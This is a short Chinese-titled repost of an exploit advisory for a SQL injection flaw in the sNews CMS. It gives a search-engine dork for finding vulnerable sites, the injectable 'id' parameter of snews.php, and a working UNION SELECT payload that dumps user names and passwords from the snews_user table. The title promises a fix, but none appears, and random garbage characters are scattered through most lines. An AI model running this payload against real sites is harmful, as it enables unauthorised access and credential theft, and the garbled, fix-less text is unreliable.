CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
3 D! l' o  c9 O% X# B- L作者: By onestree
4 y0 N8 z) D( h- d: ~下载地址 : http://snewscms.com/
测试平台 : ubuntu 12.10 / win 7
关键词: inurl:"tanyakan pada rumput yang bergoyang"

: F) V6 Z- Z8 x, f* O* [( I8 H% ]
*************************************************************
+ \* Z( ^* x- v+ N/ P3 r# ]+ P, X
8 b2 N6 s2 U/ `( ~  ]2 N! Y7 T( @SQL poc:
5 M6 P2 N; K  z( u5 g* ]
9 F. h* v5 K, h) @4 @$ M: E$ _http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
) v8 s' k( ~5 R5 R9 @; A, W" l' r- Z
示例
& p7 K( {% Q' x* @; Z% N
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

1 X0 c8 _. Y2 K7 M. Y7 f! G9 ^4 s
/ Q% R8 o8 M3 L8 Z! F1 P- B致谢:
" w, ]# k# f4 M
" R, L$ P# d  @% l  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
6 ?' e2 s, D0 D% S4 P7 g     
) ]( D: k6 X- s          indonesiancoder - moeslimh4x0r - go-coder

* ^& G, h8 J: O: u' W1 T3 a: g6 O4 Tspesial my hunny :*
% M" ^8 |( `2 g; d